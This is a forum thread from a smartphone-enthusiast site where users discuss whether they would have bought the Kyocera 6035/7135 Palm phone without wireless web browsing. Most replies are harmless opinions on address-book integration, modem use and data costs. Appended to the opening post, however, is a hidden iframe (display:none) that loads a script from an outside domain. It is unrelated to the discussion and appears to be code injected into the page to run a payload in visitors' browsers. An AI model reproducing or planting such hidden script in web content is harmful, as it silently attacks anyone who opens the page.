Poll: Would you have bought a 6035/7135 if there was NO wiresless surfing

+ Reply to Thread

Would you have bought the 6035/7135...

If there was NO wireless options. The palm and phone can still use the addrss book the same way and everything, and same design, but you couldn't surf the net, except with a built in WAP browser that your Service Provider gave you?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

i'd have to be able to use it as a data modem to send with.
    Where does he get all those wonderful toys? -- The Joker (Jack not Cesar)

Administrator
    nope. i would just get an air card and grab me a smaller celly... :drink3

Mod-Blog's SmartPhone Correspondent
    Personally, I bought it for the address book integration. The ability to surf the Net was just a great bonus!

I voted that I wouldn't get one... but I guess I could live with WAP only as long as I could use it as a modem. What about PQA's? Could we use them?
    Please visit my picture site: Robert-O-Rama :)

I would definitely have bought the 6035 w/o wireless surfing (for me it was all about carrying 1 gadget instead of 2), but I wouldn't be willing to give it up now.

My "Elaboration" :
    I might not have bought it, but do you know how often I use it?
    Approximately Nonce per month.

I'm sure I would use it if it didn't cost me extra money, but on my plan it does, so I don't.

So why wouldn't I buy?
    Well, if the device didn't have that function, quite simply, I would wonder why not. Do you old f**ts remember the Reese's Peanut Butter Cups ads from the 70s and 80s?

"You got your chocolate in my peanut butter!!"
    "You got your peanut butter! on my chocolate!!"

For you young pups, the concept was stumbling onto a great combination, and then packaging it. So I say to you, in terms of a Mobile Phone, and a Palm, in one device?! Doing that but then not including the function for wireless internet would be if the two idiots in the Reese's commercial bumped into each other, realized how good the combined taste was, and then tried to sell that open jar of Peanu butter with a half-eaten candy bar sticking out of the top.

Not finished!

Internet/email is more of a convenience than a necessity for me. Sure I use it on my VZ plan, but not having it wouldn't keep me from getting the phone. The Palm and phone combo/integration is the killer implementation for me. It's all about not having to carry as much junk around. Having mobile email, and web, with the related PQAs is just icing on the cake.